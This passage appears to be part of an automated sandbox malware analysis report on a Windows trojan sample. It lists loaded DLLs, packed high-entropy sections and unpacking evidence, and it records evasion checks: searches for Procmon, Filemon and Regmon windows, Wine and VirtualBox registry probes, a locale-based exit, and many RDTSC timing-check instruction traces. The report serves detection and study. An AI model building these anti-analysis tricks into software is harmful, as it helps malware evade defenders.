              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A9BC7F0_2_00A9BC7F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AA0DDE0_2_00AA0DDE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A91D350_2_00A91D35
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0093256D0_2_0093256D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A937BF0_2_00A937BF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A9D7940_2_00A9D794
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A8E7C00_2_00A8E7C0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A987280_2_00A98728
              Source: C:\Users\user\Desktop\file.exeCode function: String function: 006D4A60 appears 316 times
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: file.exeStatic PE information: Section: ktlotalb ZLIB complexity 0.9947270297547847
              Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006F3A50 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_006F3A50
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006ECAE0 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_006ECAE0
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\MTU69GSG.htmJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: file.exeReversingLabs: Detection: 42%
              Source: file.exeVirustotal: Detection: 49%
              Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
              Source: file.exeStatic file information: File size 1818624 > 1048576
              Source: file.exeStatic PE information: Raw size of ktlotalb is bigger than: 0x100000 < 0x1a2000

              Data Obfuscation

              barindex
              Detected unpacking (changes PE section rights)
              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.6d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ktlotalb:EW;fvaiddkx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ktlotalb:EW;fvaiddkx:EW;.taggant:EW;
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006F6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_006F6390
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: file.exeStatic PE information: real checksum: 0x1be31e should be: 0x1cbe2d
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: ktlotalb
              Source: file.exeStatic PE information: section name: fvaiddkx
              Source: file.exeStatic PE information: section name: .taggant
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AF70A1 push edx; mov dword ptr [esp], eax0_2_00AF710C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AF70A1 push ebx; mov dword ptr [esp], 47FFCFEBh0_2_00AF717C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099B817 push eax; mov dword ptr [esp], edi0_2_0099B848
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A0102F push esi; mov dword ptr [esp], ecx0_2_00A01091
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A0102F push 5A877B96h; mov dword ptr [esp], ecx0_2_00A010A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A0102F push 377825ECh; mov dword ptr [esp], esi0_2_00A01109
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D6F046 push 43D3EA01h; mov dword ptr [esp], esi0_2_00D6F060
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D6F046 push edx; mov dword ptr [esp], eax0_2_00D6F0EC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D6F046 push ebp; mov dword ptr [esp], edi0_2_00D6F136
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D6F046 push 41C0D35Bh; mov dword ptr [esp], edx0_2_00D6F146
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B3601A push 5E6E137Dh; mov dword ptr [esp], edx0_2_00B360BA
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B37808 push esi; mov dword ptr [esp], 673D44C3h0_2_00B37828
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B37808 push 410E31D9h; mov dword ptr [esp], edi0_2_00B37886
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B2585E push eax; mov dword ptr [esp], ecx0_2_00B25897
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B2585E push edi; mov dword ptr [esp], 69D73AADh0_2_00B258D3
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B3D05E push eax; mov dword ptr [esp], ecx0_2_00B3D0C3
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B0B844 push 689B4020h; mov dword ptr [esp], ebx0_2_00B0B8F2
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006F7895 push ecx; ret 0_2_006F78A8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A2B9A6 push eax; mov dword ptr [esp], 375E771Dh0_2_00A2BA71
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A2B9A6 push eax; mov dword ptr [esp], 00000000h0_2_00A2BA7C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B691BB push 04786FDCh; mov dword ptr [esp], eax0_2_00B691C9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A421B2 push edx; mov dword ptr [esp], 5FFB08C6h0_2_00A421CA
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AFD1B8 push 4B4D1780h; mov dword ptr [esp], ecx0_2_00AFD07A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AFD1B8 push 1BA288D8h; mov dword ptr [esp], esp0_2_00AFD086
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AFD1B8 push 6AD83951h; mov dword ptr [esp], eax0_2_00AFD137
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AFD1B8 push ecx; mov dword ptr [esp], ebx0_2_00AFD26B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B021AE push 522893E0h; mov dword ptr [esp], esp0_2_00B02208
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AFE183 push 098368B1h; mov dword ptr [esp], eax0_2_00AFE252
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A9799B push ebx; mov dword ptr [esp], ecx0_2_00A97B0C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A9799B push edx; mov dword ptr [esp], 2C3FAC8Fh0_2_00A97B35
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A9799B push 4E817043h; mov dword ptr [esp], eax0_2_00A97B70
              Source: file.exeStatic PE information: section name: ktlotalb entropy: 7.953808947357536

              Boot Survival

              barindex
              Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006F6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_006F6390

              Malware Analysis System Evasion

              barindex
              Found evasive API chain (may stop execution after checking locale)
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-26666
              Tries to detect sandboxes / dynamic malware analysis system (registry check)
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Tries to detect virtualization through RDTSC time measurements
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA69F8 second address: AA6A02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA6A02 second address: AA6A10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FD184FDBE76h 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA6A10 second address: AA6A1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA6A1C second address: AA6A26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FD184FDBE76h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA6A26 second address: AA6A31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA6A31 second address: AA6A36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA6A36 second address: AA6A5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD185A97D0Ch 0x00000008 jmp 00007FD185A97D14h 0x0000000d popad 0x0000000e push eax 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8E2D3 second address: A8E2F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edi 0x00000007 jmp 00007FD184FDBE87h 0x0000000c popad 0x0000000d push edx 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8E2F6 second address: A8E2FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA5A04 second address: AA5A0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA5B6D second address: AA5B71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA5B71 second address: AA5B94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD184FDBE89h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA5B94 second address: AA5B98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA5CC6 second address: AA5CCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA5CCA second address: AA5CCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA5F6A second address: AA5F70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA5F70 second address: AA5F92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FD185A97D19h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA60F6 second address: AA612A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FD184FDBE82h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD184FDBE89h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA612A second address: AA612E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA612E second address: AA6148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD184FDBE84h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA84DA second address: AA855A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD185A97D0Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 4F93C697h 0x00000010 push 00000000h 0x00000012 push esi 0x00000013 call 00007FD185A97D08h 0x00000018 pop esi 0x00000019 mov dword ptr [esp+04h], esi 0x0000001d add dword ptr [esp+04h], 00000014h 0x00000025 inc esi 0x00000026 push esi 0x00000027 ret 0x00000028 pop esi 0x00000029 ret 0x0000002a mov di, B8A6h 0x0000002e push 00000003h 0x00000030 pushad 0x00000031 push esi 0x00000032 pop ecx 0x00000033 call 00007FD185A97D0Dh 0x00000038 call 00007FD185A97D0Bh 0x0000003d pop ebx 0x0000003e pop ecx 0x0000003f popad 0x00000040 mov dword ptr [ebp+122D1BA0h], eax 0x00000046 push 00000000h 0x00000048 jnp 00007FD185A97D0Ch 0x0000004e push 00000003h 0x00000050 mov dword ptr [ebp+122D2385h], ebx 0x00000056 push A8362947h 0x0000005b pushad 0x0000005c push eax 0x0000005d push edx 0x0000005e push ebx 0x0000005f pop ebx 0x00000060 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA855A second address: AA855E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA8680 second address: AA869F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FD185A97D06h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD185A97D12h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA869F second address: AA8708 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jmp 00007FD184FDBE84h 0x00000010 pop eax 0x00000011 jno 00007FD184FDBE7Ch 0x00000017 push 00000003h 0x00000019 push 00000000h 0x0000001b mov ecx, 69734C6Eh 0x00000020 push 00000003h 0x00000022 add cl, 00000062h 0x00000025 call 00007FD184FDBE79h 0x0000002a js 00007FD184FDBE89h 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 pushad 0x00000035 popad 0x00000036 ja 00007FD184FDBE76h 0x0000003c popad 0x0000003d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA8708 second address: AA870F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA870F second address: AA8754 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jc 00007FD184FDBE85h 0x00000011 jmp 00007FD184FDBE7Fh 0x00000016 mov eax, dword ptr [eax] 0x00000018 jg 00007FD184FDBE86h 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 jno 00007FD184FDBE80h 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA87B9 second address: AA886C instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD185A97D08h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FD185A97D0Fh 0x00000010 nop 0x00000011 mov edi, dword ptr [ebp+122D29E2h] 0x00000017 push 00000000h 0x00000019 xor di, 904Ah 0x0000001e push 82FFFF19h 0x00000023 ja 00007FD185A97D0Eh 0x00000029 add dword ptr [esp], 7D000167h 0x00000030 and ecx, dword ptr [ebp+122D1E2Ch] 0x00000036 push 00000003h 0x00000038 push 00000000h 0x0000003a push ebx 0x0000003b call 00007FD185A97D08h 0x00000040 pop ebx 0x00000041 mov dword ptr [esp+04h], ebx 0x00000045 add dword ptr [esp+04h], 00000019h 0x0000004d inc ebx 0x0000004e push ebx 0x0000004f ret 0x00000050 pop ebx 0x00000051 ret 0x00000052 or dword ptr [ebp+122D1B6Fh], edi 0x00000058 mov dword ptr [ebp+122D39E0h], esi 0x0000005e push 00000000h 0x00000060 push 00000003h 0x00000062 mov ecx, dword ptr [ebp+122D2375h] 0x00000068 call 00007FD185A97D16h 0x0000006d mov esi, dword ptr [ebp+122D2B16h] 0x00000073 pop edx 0x00000074 call 00007FD185A97D09h 0x00000079 jl 00007FD185A97D14h 0x0000007f push eax 0x00000080 push edx 0x00000081 pushad 0x00000082 popad 0x00000083 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA886C second address: AA88CD instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD184FDBE76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FD184FDBE83h 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 ja 00007FD184FDBE94h 0x0000001a mov eax, dword ptr [eax] 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FD184FDBE85h 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA88CD second address: AA88EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD185A97D19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA88EA second address: AA890F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FD184FDBE85h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA890F second address: AA891F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD185A97D0Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACA07B second address: ACA081 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACA081 second address: ACA09F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edi 0x00000006 jmp 00007FD185A97D14h 0x0000000b pop edi 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC7FCA second address: AC7FD4 instructions: 0x00000000 rdtsc 0x00000002 js 00007FD184FDBE76h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC7FD4 second address: AC7FDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC7FDD second address: AC7FF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FD184FDBE76h 0x0000000a pop edx 0x0000000b popad 0x0000000c push esi 0x0000000d jnp 00007FD184FDBE7Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC82A1 second address: AC82C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jns 00007FD185A97D0Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD185A97D0Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC82C6 second address: AC82CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC82CA second address: AC82D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC82D0 second address: AC82EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FD184FDBE81h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC8572 second address: AC8576 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC8576 second address: AC857A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC8860 second address: AC886F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC886F second address: AC8873 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC8873 second address: AC8899 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD185A97D06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FD185A97D0Eh 0x0000000f jmp 00007FD185A97D0Bh 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC89BD second address: AC89F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD184FDBE84h 0x00000007 jmp 00007FD184FDBE82h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 jne 00007FD184FDBE76h 0x00000017 pop esi 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC89F1 second address: AC89FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FD185A97D06h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC89FD second address: AC8A03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC8F9B second address: AC8FA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC8FA4 second address: AC8FA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC9115 second address: AC9119 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC9119 second address: AC9123 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
